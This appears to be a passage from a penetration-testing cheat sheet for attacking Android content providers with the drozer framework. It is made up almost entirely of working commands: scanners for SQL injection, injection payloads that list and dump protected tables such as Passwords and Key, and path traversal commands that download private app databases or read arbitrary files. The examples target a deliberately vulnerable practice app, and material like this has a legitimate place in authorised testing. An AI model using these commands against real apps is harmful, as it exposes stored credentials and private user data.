Use URIs from above or guess yourself:
(in addition: .insert / .update / .delete)
run app.provider.query content://<URI> --vertical
Test content providers for SQL-Injection:
run scanner.provider.injection -a com.x.x.x
Find tables accessible through SQL-Injection:
run scanner.provider.sqltables -a com.x.x.x
SQLi
list all db tables
run app.provider.query content://com.x.x.x.ProviderName/path/ --prjection "* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "'" unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords
run app.provider.query content://com.x.x.x.ProviderName/path/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
Example - retrieve data from otherwise protected tables:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
FILESYSTEM-CP
Download db:
run app.provider.download content://com.x.x.x.ProviderName/../../../../../../../../data/data/com.x.x.x/database.db /home/user/database.db
Find content provider that are susceptible to directory-traversal:
run scanner.provider.traversal -a com.x.x.x
run app.provider.read content://com.x.x.x.ProviderName/path/to/file
Example
(/etc/hosts is world-readable -> no biggy)
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
or
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
